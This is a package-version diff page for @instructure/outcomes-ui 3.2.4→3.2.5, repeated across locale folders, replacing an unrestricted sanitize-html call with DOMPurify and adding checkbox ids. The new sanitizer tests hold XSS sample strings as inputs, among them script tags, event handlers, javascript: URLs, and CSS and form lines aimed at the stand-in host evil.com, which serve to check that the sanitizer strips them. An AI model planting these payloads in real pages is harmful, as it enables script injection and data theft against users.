npm - @instructure/outcomes-ui - Versions diffs - 3.2.4 → 3.2.5 - Mend

@instructure/outcomes-ui 3.2.4 → 3.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (481) hide show

package/es/translated/en/lib/__tests__/sanitize.test.js CHANGED Viewed

@@ -1,16 +1,138 @@
 import { expect } from 'chai';
 import { sanitizeHtml } from "../sanitize.js";
-describe('sanitizeForHtml', function () {
-  it('cleans invalid tags', function () {
-    var invalid = '<monkey>tag isn\'t closed';
-    expect(sanitizeHtml(invalid)).to.include('</monkey>');
+describe('sanitizeHtml', function () {
+  describe('equation images (Canvas-specific)', function () {
+    it('rewrites /equation_images src to absolute canvas URL', function () {
+      var equationImage = 'Some text with an <img src="/equation_images/image" />';
+      expect(sanitizeHtml(equationImage)).to.include('canvas.instructure.com/equation_images/image');
+    });
+    it('adds vertical-align style to equation images', function () {
+      var equationImage = '<img src="/equation_images/abc" />';
+      expect(sanitizeHtml(equationImage)).to.include('vertical-align: middle');
+    });
+    it('leaves non-equation image src untouched', function () {
+      var otherImage = '<img src="/another_image">';
+      var out = sanitizeHtml(otherImage);
+      expect(out).to.include('src="/another_image"');
+      expect(out).to.not.include('canvas.instructure.com');
+    });
   });
-  it('replaces equation images', function () {
-    var equationImage = 'Some text with an <img src="/equation_images/image" />';
-    expect(sanitizeHtml(equationImage)).to.include('canvas.instructure.com/equation_images/image');
+  describe('null / empty input handling', function () {
+    it('returns empty string for null', function () {
+      expect(sanitizeHtml(null)).to.equal('');
+    });
+    it('returns empty string for undefined', function () {
+      expect(sanitizeHtml(void 0)).to.equal('');
+    });
+    it('returns empty string for empty string', function () {
+      expect(sanitizeHtml('')).to.equal('');
+    });
   });
-  it('leaves other images alone', function () {
-    var otherImage = 'Some text with <img src="/another_image" />';
-    expect(sanitizeHtml(otherImage)).to.eq(otherImage);
+  describe('XSS - script execution vectors', function () {
+    it('strips <script> tags', function () {
+      var xss = 'Hello<script>alert(1)</script>World';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.include('<script');
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips inline event handlers (onerror)', function () {
+      var xss = '<img src="x" onerror="alert(1)">';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onerror/i);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips inline event handlers (onclick)', function () {
+      var xss = '<a href="#" onclick="alert(1)">click</a>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onclick/i);
+    });
+    it('strips inline event handlers (onload on svg)', function () {
+      var xss = '<svg onload="alert(1)"></svg>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onload/i);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips javascript: URLs in href', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<a href="javascript:alert(1)">x</a>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/javascript:/i);
+    });
+    it('strips javascript: URLs in img src', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<img src="javascript:alert(1)">';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/javascript:/i);
+    });
+    it('strips data: URLs that contain HTML/JS in iframe src', function () {
+      var xss = '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips <object> tags', function () {
+      var xss = '<object data="evil.swf"></object>';
+      expect(sanitizeHtml(xss)).to.not.include('<object');
+    });
+    it('strips <embed> tags', function () {
+      var xss = '<embed src="evil.swf">';
+      expect(sanitizeHtml(xss)).to.not.include('<embed');
+    });
+    it('strips <form> tags (CSRF / phishing surface)', function () {
+      var xss = '<form action="https://evil.com"><input name=x></form>';
+      expect(sanitizeHtml(xss)).to.not.include('<form');
+    });
+    it('strips style tags (CSS-based exfil / clickjacking)', function () {
+      var xss = '<style>body{background:url(//evil.com/?c=)}</style>';
+      expect(sanitizeHtml(xss)).to.not.include('<style');
+    });
+    it('strips <meta http-equiv refresh> redirects', function () {
+      var xss = '<meta http-equiv="refresh" content="0;url=https://evil.com">';
+      expect(sanitizeHtml(xss)).to.not.include('<meta');
+    });
+    it('strips <base> tag (can rewrite all relative URLs)', function () {
+      var xss = '<base href="https://evil.com/">';
+      expect(sanitizeHtml(xss)).to.not.include('<base');
+    });
+    it('strips encoded onerror payloads', function () {
+      var xss = '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onerror/i);
+    });
+    it('strips mixed-case obfuscated script tags', function () {
+      var xss = '<ScRiPt>alert(1)</sCrIpT>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/<script/i);
+      expect(out).to.not.include('alert(1)');
+    });
+  });
+  describe('benign HTML (should be preserved)', function () {
+    it('preserves basic formatting tags', function () {
+      var html = '<p>Hello <strong>world</strong> <em>!</em></p>';
+      expect(sanitizeHtml(html)).to.equal(html);
+    });
+    it('preserves links with safe http(s) hrefs', function () {
+      var html = '<a href="https://example.com">link</a>';
+      expect(sanitizeHtml(html)).to.include('href="https://example.com"');
+    });
+    it('preserves lists', function () {
+      var html = '<ul><li>a</li><li>b</li></ul>';
+      expect(sanitizeHtml(html)).to.equal(html);
+    });
+    it('preserves Canvas RCE iframes (Studio / media embeds)', function () {
+      var html = '<iframe src="https://canvas.instructure.com/media_objects_iframe/123" ' + 'allowfullscreen="" allow="fullscreen" frameborder="0" ' + 'data-media-id="123" data-media-type="video"></iframe>';
+      var out = sanitizeHtml(html);
+      expect(out).to.include('<iframe');
+      expect(out).to.include('data-media-id="123"');
+      expect(out).to.include('data-media-type="video"');
+      expect(out).to.include('allowfullscreen');
+    });
+  });
+  describe('link hardening', function () {
+    it('adds rel="noopener noreferrer" to target=_blank links', function () {
+      var html = '<a href="https://example.com" target="_blank">x</a>';
+      var out = sanitizeHtml(html);
+      expect(out).to.match(/rel=["'][^"']*noopener[^"']*["']/);
+      expect(out).to.match(/rel=["'][^"']*noreferrer[^"']*["']/);
+    });
   });
 });

package/es/translated/en/lib/sanitize.js CHANGED Viewed

@@ -1,29 +1,25 @@
-import _objectSpread from "@babel/runtime/helpers/esm/objectSpread2";
-import libSanitizeHtml from 'sanitize-html';
-function transformEquationImage(tagName, attribs) {
-  return {
-    tagName: tagName,
-    attribs: _objectSpread(_objectSpread({}, attribs), {}, {
-      src: "https://canvas.instructure.com".concat(attribs.src),
-      style: 'vertical-align: middle'
-    })
-  };
-}
-function transformImage(tagName, attribs) {
-  if (attribs.src != null && attribs.src.indexOf('/equation_images') === 0) {
-    return transformEquationImage(tagName, attribs);
+import DOMPurify from 'dompurify';
+var CONFIG = {
+  ADD_TAGS: ['iframe'],
+  ADD_ATTR: ['allowfullscreen', 'allow', 'frameborder', 'sandbox', 'target', 'data-media-id', 'data-media-type'],
+  FORBID_TAGS: ['form', 'input', 'button', 'textarea', 'select', 'option']
+};
+// Rewrite Canvas equation-image relative URLs to absolute,
+// preserving the previous behavior of this module.
+DOMPurify.addHook('afterSanitizeAttributes', function (node) {
+  if (node.tagName === 'IMG') {
+    var src = node.getAttribute('src') || '';
+    if (src.indexOf('/equation_images') === 0) {
+      node.setAttribute('src', "https://canvas.instructure.com".concat(src));
+      node.setAttribute('style', 'vertical-align: middle');
+    }
+  }
+  // Harden links opened in a new tab against tab-nabbing.
+  if (node.tagName === 'A' && node.getAttribute('target') === '_blank') {
+    node.setAttribute('rel', 'noopener noreferrer');
   }
-  return {
-    tagName: tagName,
-    attribs: attribs
-  };
-}
+});
 export function sanitizeHtml(html) {
-  return libSanitizeHtml(html, {
-    allowedTags: false,
-    allowedAttributes: false,
-    transformTags: {
-      img: transformImage
-    }
-  });
+  return DOMPurify.sanitize(html == null ? '' : html, CONFIG);
 }

package/es/translated/en-AU/components/OutcomeCheckbox/__tests__/index.test.js CHANGED Viewed

@@ -23,10 +23,13 @@ describe('OutcomeCheckbox', function () {
     }, props);
   }
   it('renders a checkbox', function () {
-    var wrapper = mount( /*#__PURE__*/React.createElement(OutcomeCheckbox, makeProps()), {
+    var props = makeProps();
+    var wrapper = mount( /*#__PURE__*/React.createElement(OutcomeCheckbox, props), {
       disableLifecycleMethods: true
     });
-    expect(wrapper.find(Checkbox)).to.have.length(1);
+    var checkbox = wrapper.find(Checkbox);
+    expect(checkbox).to.have.length(1);
+    expect(checkbox.prop('id')).to.equal("outcome-select-".concat(props.outcome.id));
   });
   it('renders outcome title in link', function () {
     var props = makeProps();

package/es/translated/en-AU/components/OutcomeCheckbox/index.js CHANGED Viewed

@@ -48,6 +48,7 @@ var OutcomeCheckbox = (_dec = withStyle(generateStyle, generateComponentTheme),
         css: this.props.styles.checkbox,
         className: "OutcomeSelector"
       }, jsx(Checkbox, {
+        id: "outcome-select-".concat(id),
         value: id,
         checked: this.selected(),
         onChange: function onChange() {

package/es/translated/en-AU/components/OutcomeSelectionList/__tests__/index.test.js CHANGED Viewed

@@ -68,6 +68,7 @@ describe('OutcomeSelectionList', function () {
     });
     // Enzyme finds extra Checkbox components because of the instui decorator on the component
     expect(wrapper.find('Checkbox[value="selectAll"]')).to.have.length(3);
+    expect(wrapper.find('Checkbox[value="selectAll"]').at(0).prop('id')).to.equal('outcome-select-all');
   });
   it('renders select all as unchecked when no outcomes selected', function () {
     var wrapper = mount( /*#__PURE__*/React.createElement(OutcomeSelectionList, makeProps()), {

package/es/translated/en-AU/components/OutcomeSelectionList/index.js CHANGED Viewed

@@ -77,6 +77,7 @@ var OutcomeSelectionList = (_dec = withStyle(generateStyle, generateComponentThe
       }, jsx("div", {
         css: this.props.styles.checkbox
       }, jsx(Checkbox, {
+        id: "outcome-select-all",
         value: "selectAll",
         checked: this.allSelected(),
         onChange: function onChange() {

package/es/translated/en-AU/lib/__tests__/sanitize.test.js CHANGED Viewed

@@ -1,16 +1,138 @@
 import { expect } from 'chai';
 import { sanitizeHtml } from "../sanitize.js";
-describe('sanitizeForHtml', function () {
-  it('cleans invalid tags', function () {
-    var invalid = '<monkey>tag isn\'t closed';
-    expect(sanitizeHtml(invalid)).to.include('</monkey>');
+describe('sanitizeHtml', function () {
+  describe('equation images (Canvas-specific)', function () {
+    it('rewrites /equation_images src to absolute canvas URL', function () {
+      var equationImage = 'Some text with an <img src="/equation_images/image" />';
+      expect(sanitizeHtml(equationImage)).to.include('canvas.instructure.com/equation_images/image');
+    });
+    it('adds vertical-align style to equation images', function () {
+      var equationImage = '<img src="/equation_images/abc" />';
+      expect(sanitizeHtml(equationImage)).to.include('vertical-align: middle');
+    });
+    it('leaves non-equation image src untouched', function () {
+      var otherImage = '<img src="/another_image">';
+      var out = sanitizeHtml(otherImage);
+      expect(out).to.include('src="/another_image"');
+      expect(out).to.not.include('canvas.instructure.com');
+    });
   });
-  it('replaces equation images', function () {
-    var equationImage = 'Some text with an <img src="/equation_images/image" />';
-    expect(sanitizeHtml(equationImage)).to.include('canvas.instructure.com/equation_images/image');
+  describe('null / empty input handling', function () {
+    it('returns empty string for null', function () {
+      expect(sanitizeHtml(null)).to.equal('');
+    });
+    it('returns empty string for undefined', function () {
+      expect(sanitizeHtml(void 0)).to.equal('');
+    });
+    it('returns empty string for empty string', function () {
+      expect(sanitizeHtml('')).to.equal('');
+    });
   });
-  it('leaves other images alone', function () {
-    var otherImage = 'Some text with <img src="/another_image" />';
-    expect(sanitizeHtml(otherImage)).to.eq(otherImage);
+  describe('XSS - script execution vectors', function () {
+    it('strips <script> tags', function () {
+      var xss = 'Hello<script>alert(1)</script>World';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.include('<script');
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips inline event handlers (onerror)', function () {
+      var xss = '<img src="x" onerror="alert(1)">';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onerror/i);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips inline event handlers (onclick)', function () {
+      var xss = '<a href="#" onclick="alert(1)">click</a>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onclick/i);
+    });
+    it('strips inline event handlers (onload on svg)', function () {
+      var xss = '<svg onload="alert(1)"></svg>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onload/i);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips javascript: URLs in href', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<a href="javascript:alert(1)">x</a>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/javascript:/i);
+    });
+    it('strips javascript: URLs in img src', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<img src="javascript:alert(1)">';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/javascript:/i);
+    });
+    it('strips data: URLs that contain HTML/JS in iframe src', function () {
+      var xss = '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips <object> tags', function () {
+      var xss = '<object data="evil.swf"></object>';
+      expect(sanitizeHtml(xss)).to.not.include('<object');
+    });
+    it('strips <embed> tags', function () {
+      var xss = '<embed src="evil.swf">';
+      expect(sanitizeHtml(xss)).to.not.include('<embed');
+    });
+    it('strips <form> tags (CSRF / phishing surface)', function () {
+      var xss = '<form action="https://evil.com"><input name=x></form>';
+      expect(sanitizeHtml(xss)).to.not.include('<form');
+    });
+    it('strips style tags (CSS-based exfil / clickjacking)', function () {
+      var xss = '<style>body{background:url(//evil.com/?c=)}</style>';
+      expect(sanitizeHtml(xss)).to.not.include('<style');
+    });
+    it('strips <meta http-equiv refresh> redirects', function () {
+      var xss = '<meta http-equiv="refresh" content="0;url=https://evil.com">';
+      expect(sanitizeHtml(xss)).to.not.include('<meta');
+    });
+    it('strips <base> tag (can rewrite all relative URLs)', function () {
+      var xss = '<base href="https://evil.com/">';
+      expect(sanitizeHtml(xss)).to.not.include('<base');
+    });
+    it('strips encoded onerror payloads', function () {
+      var xss = '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onerror/i);
+    });
+    it('strips mixed-case obfuscated script tags', function () {
+      var xss = '<ScRiPt>alert(1)</sCrIpT>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/<script/i);
+      expect(out).to.not.include('alert(1)');
+    });
+  });
+  describe('benign HTML (should be preserved)', function () {
+    it('preserves basic formatting tags', function () {
+      var html = '<p>Hello <strong>world</strong> <em>!</em></p>';
+      expect(sanitizeHtml(html)).to.equal(html);
+    });
+    it('preserves links with safe http(s) hrefs', function () {
+      var html = '<a href="https://example.com">link</a>';
+      expect(sanitizeHtml(html)).to.include('href="https://example.com"');
+    });
+    it('preserves lists', function () {
+      var html = '<ul><li>a</li><li>b</li></ul>';
+      expect(sanitizeHtml(html)).to.equal(html);
+    });
+    it('preserves Canvas RCE iframes (Studio / media embeds)', function () {
+      var html = '<iframe src="https://canvas.instructure.com/media_objects_iframe/123" ' + 'allowfullscreen="" allow="fullscreen" frameborder="0" ' + 'data-media-id="123" data-media-type="video"></iframe>';
+      var out = sanitizeHtml(html);
+      expect(out).to.include('<iframe');
+      expect(out).to.include('data-media-id="123"');
+      expect(out).to.include('data-media-type="video"');
+      expect(out).to.include('allowfullscreen');
+    });
+  });
+  describe('link hardening', function () {
+    it('adds rel="noopener noreferrer" to target=_blank links', function () {
+      var html = '<a href="https://example.com" target="_blank">x</a>';
+      var out = sanitizeHtml(html);
+      expect(out).to.match(/rel=["'][^"']*noopener[^"']*["']/);
+      expect(out).to.match(/rel=["'][^"']*noreferrer[^"']*["']/);
+    });
   });
 });

package/es/translated/en-AU/lib/sanitize.js CHANGED Viewed

@@ -1,29 +1,25 @@
-import _objectSpread from "@babel/runtime/helpers/esm/objectSpread2";
-import libSanitizeHtml from 'sanitize-html';
-function transformEquationImage(tagName, attribs) {
-  return {
-    tagName: tagName,
-    attribs: _objectSpread(_objectSpread({}, attribs), {}, {
-      src: "https://canvas.instructure.com".concat(attribs.src),
-      style: 'vertical-align: middle'
-    })
-  };
-}
-function transformImage(tagName, attribs) {
-  if (attribs.src != null && attribs.src.indexOf('/equation_images') === 0) {
-    return transformEquationImage(tagName, attribs);
+import DOMPurify from 'dompurify';
+var CONFIG = {
+  ADD_TAGS: ['iframe'],
+  ADD_ATTR: ['allowfullscreen', 'allow', 'frameborder', 'sandbox', 'target', 'data-media-id', 'data-media-type'],
+  FORBID_TAGS: ['form', 'input', 'button', 'textarea', 'select', 'option']
+};
+// Rewrite Canvas equation-image relative URLs to absolute,
+// preserving the previous behavior of this module.
+DOMPurify.addHook('afterSanitizeAttributes', function (node) {
+  if (node.tagName === 'IMG') {
+    var src = node.getAttribute('src') || '';
+    if (src.indexOf('/equation_images') === 0) {
+      node.setAttribute('src', "https://canvas.instructure.com".concat(src));
+      node.setAttribute('style', 'vertical-align: middle');
+    }
+  }
+  // Harden links opened in a new tab against tab-nabbing.
+  if (node.tagName === 'A' && node.getAttribute('target') === '_blank') {
+    node.setAttribute('rel', 'noopener noreferrer');
   }
-  return {
-    tagName: tagName,
-    attribs: attribs
-  };
-}
+});
 export function sanitizeHtml(html) {
-  return libSanitizeHtml(html, {
-    allowedTags: false,
-    allowedAttributes: false,
-    transformTags: {
-      img: transformImage
-    }
-  });
+  return DOMPurify.sanitize(html == null ? '' : html, CONFIG);
 }

package/es/translated/en-AU-x-unimelb/components/OutcomeCheckbox/__tests__/index.test.js CHANGED Viewed

@@ -23,10 +23,13 @@ describe('OutcomeCheckbox', function () {
     }, props);
   }
   it('renders a checkbox', function () {
-    var wrapper = mount( /*#__PURE__*/React.createElement(OutcomeCheckbox, makeProps()), {
+    var props = makeProps();
+    var wrapper = mount( /*#__PURE__*/React.createElement(OutcomeCheckbox, props), {
       disableLifecycleMethods: true
     });
-    expect(wrapper.find(Checkbox)).to.have.length(1);
+    var checkbox = wrapper.find(Checkbox);
+    expect(checkbox).to.have.length(1);
+    expect(checkbox.prop('id')).to.equal("outcome-select-".concat(props.outcome.id));
   });
   it('renders outcome title in link', function () {
     var props = makeProps();

package/es/translated/en-AU-x-unimelb/components/OutcomeCheckbox/index.js CHANGED Viewed

@@ -48,6 +48,7 @@ var OutcomeCheckbox = (_dec = withStyle(generateStyle, generateComponentTheme),
         css: this.props.styles.checkbox,
         className: "OutcomeSelector"
       }, jsx(Checkbox, {
+        id: "outcome-select-".concat(id),
         value: id,
         checked: this.selected(),
         onChange: function onChange() {

package/es/translated/en-AU-x-unimelb/components/OutcomeSelectionList/__tests__/index.test.js CHANGED Viewed

@@ -68,6 +68,7 @@ describe('OutcomeSelectionList', function () {
     });
     // Enzyme finds extra Checkbox components because of the instui decorator on the component
     expect(wrapper.find('Checkbox[value="selectAll"]')).to.have.length(3);
+    expect(wrapper.find('Checkbox[value="selectAll"]').at(0).prop('id')).to.equal('outcome-select-all');
   });
   it('renders select all as unchecked when no outcomes selected', function () {
     var wrapper = mount( /*#__PURE__*/React.createElement(OutcomeSelectionList, makeProps()), {

package/es/translated/en-AU-x-unimelb/components/OutcomeSelectionList/index.js CHANGED Viewed

@@ -77,6 +77,7 @@ var OutcomeSelectionList = (_dec = withStyle(generateStyle, generateComponentThe
       }, jsx("div", {
         css: this.props.styles.checkbox
       }, jsx(Checkbox, {
+        id: "outcome-select-all",
         value: "selectAll",
         checked: this.allSelected(),
         onChange: function onChange() {

package/es/translated/en-AU-x-unimelb/lib/__tests__/sanitize.test.js CHANGED Viewed

@@ -1,16 +1,138 @@
 import { expect } from 'chai';
 import { sanitizeHtml } from "../sanitize.js";
-describe('sanitizeForHtml', function () {
-  it('cleans invalid tags', function () {
-    var invalid = '<monkey>tag isn\'t closed';
-    expect(sanitizeHtml(invalid)).to.include('</monkey>');
+describe('sanitizeHtml', function () {
+  describe('equation images (Canvas-specific)', function () {
+    it('rewrites /equation_images src to absolute canvas URL', function () {
+      var equationImage = 'Some text with an <img src="/equation_images/image" />';
+      expect(sanitizeHtml(equationImage)).to.include('canvas.instructure.com/equation_images/image');
+    });
+    it('adds vertical-align style to equation images', function () {
+      var equationImage = '<img src="/equation_images/abc" />';
+      expect(sanitizeHtml(equationImage)).to.include('vertical-align: middle');
+    });
+    it('leaves non-equation image src untouched', function () {
+      var otherImage = '<img src="/another_image">';
+      var out = sanitizeHtml(otherImage);
+      expect(out).to.include('src="/another_image"');
+      expect(out).to.not.include('canvas.instructure.com');
+    });
   });
-  it('replaces equation images', function () {
-    var equationImage = 'Some text with an <img src="/equation_images/image" />';
-    expect(sanitizeHtml(equationImage)).to.include('canvas.instructure.com/equation_images/image');
+  describe('null / empty input handling', function () {
+    it('returns empty string for null', function () {
+      expect(sanitizeHtml(null)).to.equal('');
+    });
+    it('returns empty string for undefined', function () {
+      expect(sanitizeHtml(void 0)).to.equal('');
+    });
+    it('returns empty string for empty string', function () {
+      expect(sanitizeHtml('')).to.equal('');
+    });
   });
-  it('leaves other images alone', function () {
-    var otherImage = 'Some text with <img src="/another_image" />';
-    expect(sanitizeHtml(otherImage)).to.eq(otherImage);
+  describe('XSS - script execution vectors', function () {
+    it('strips <script> tags', function () {
+      var xss = 'Hello<script>alert(1)</script>World';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.include('<script');
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips inline event handlers (onerror)', function () {
+      var xss = '<img src="x" onerror="alert(1)">';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onerror/i);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips inline event handlers (onclick)', function () {
+      var xss = '<a href="#" onclick="alert(1)">click</a>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onclick/i);
+    });
+    it('strips inline event handlers (onload on svg)', function () {
+      var xss = '<svg onload="alert(1)"></svg>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onload/i);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips javascript: URLs in href', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<a href="javascript:alert(1)">x</a>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/javascript:/i);
+    });
+    it('strips javascript: URLs in img src', function () {
+      // eslint-disable-next-line no-script-url
+      var xss = '<img src="javascript:alert(1)">';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/javascript:/i);
+    });
+    it('strips data: URLs that contain HTML/JS in iframe src', function () {
+      var xss = '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.include('alert(1)');
+    });
+    it('strips <object> tags', function () {
+      var xss = '<object data="evil.swf"></object>';
+      expect(sanitizeHtml(xss)).to.not.include('<object');
+    });
+    it('strips <embed> tags', function () {
+      var xss = '<embed src="evil.swf">';
+      expect(sanitizeHtml(xss)).to.not.include('<embed');
+    });
+    it('strips <form> tags (CSRF / phishing surface)', function () {
+      var xss = '<form action="https://evil.com"><input name=x></form>';
+      expect(sanitizeHtml(xss)).to.not.include('<form');
+    });
+    it('strips style tags (CSS-based exfil / clickjacking)', function () {
+      var xss = '<style>body{background:url(//evil.com/?c=)}</style>';
+      expect(sanitizeHtml(xss)).to.not.include('<style');
+    });
+    it('strips <meta http-equiv refresh> redirects', function () {
+      var xss = '<meta http-equiv="refresh" content="0;url=https://evil.com">';
+      expect(sanitizeHtml(xss)).to.not.include('<meta');
+    });
+    it('strips <base> tag (can rewrite all relative URLs)', function () {
+      var xss = '<base href="https://evil.com/">';
+      expect(sanitizeHtml(xss)).to.not.include('<base');
+    });
+    it('strips encoded onerror payloads', function () {
+      var xss = '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/onerror/i);
+    });
+    it('strips mixed-case obfuscated script tags', function () {
+      var xss = '<ScRiPt>alert(1)</sCrIpT>';
+      var out = sanitizeHtml(xss);
+      expect(out).to.not.match(/<script/i);
+      expect(out).to.not.include('alert(1)');
+    });
+  });
+  describe('benign HTML (should be preserved)', function () {
+    it('preserves basic formatting tags', function () {
+      var html = '<p>Hello <strong>world</strong> <em>!</em></p>';
+      expect(sanitizeHtml(html)).to.equal(html);
+    });
+    it('preserves links with safe http(s) hrefs', function () {
+      var html = '<a href="https://example.com">link</a>';
+      expect(sanitizeHtml(html)).to.include('href="https://example.com"');
+    });
+    it('preserves lists', function () {
+      var html = '<ul><li>a</li><li>b</li></ul>';
+      expect(sanitizeHtml(html)).to.equal(html);
+    });
+    it('preserves Canvas RCE iframes (Studio / media embeds)', function () {
+      var html = '<iframe src="https://canvas.instructure.com/media_objects_iframe/123" ' + 'allowfullscreen="" allow="fullscreen" frameborder="0" ' + 'data-media-id="123" data-media-type="video"></iframe>';
+      var out = sanitizeHtml(html);
+      expect(out).to.include('<iframe');
+      expect(out).to.include('data-media-id="123"');
+      expect(out).to.include('data-media-type="video"');
+      expect(out).to.include('allowfullscreen');
+    });
+  });
+  describe('link hardening', function () {
+    it('adds rel="noopener noreferrer" to target=_blank links', function () {
+      var html = '<a href="https://example.com" target="_blank">x</a>';
+      var out = sanitizeHtml(html);
+      expect(out).to.match(/rel=["'][^"']*noopener[^"']*["']/);
+      expect(out).to.match(/rel=["'][^"']*noreferrer[^"']*["']/);
+    });
   });
 });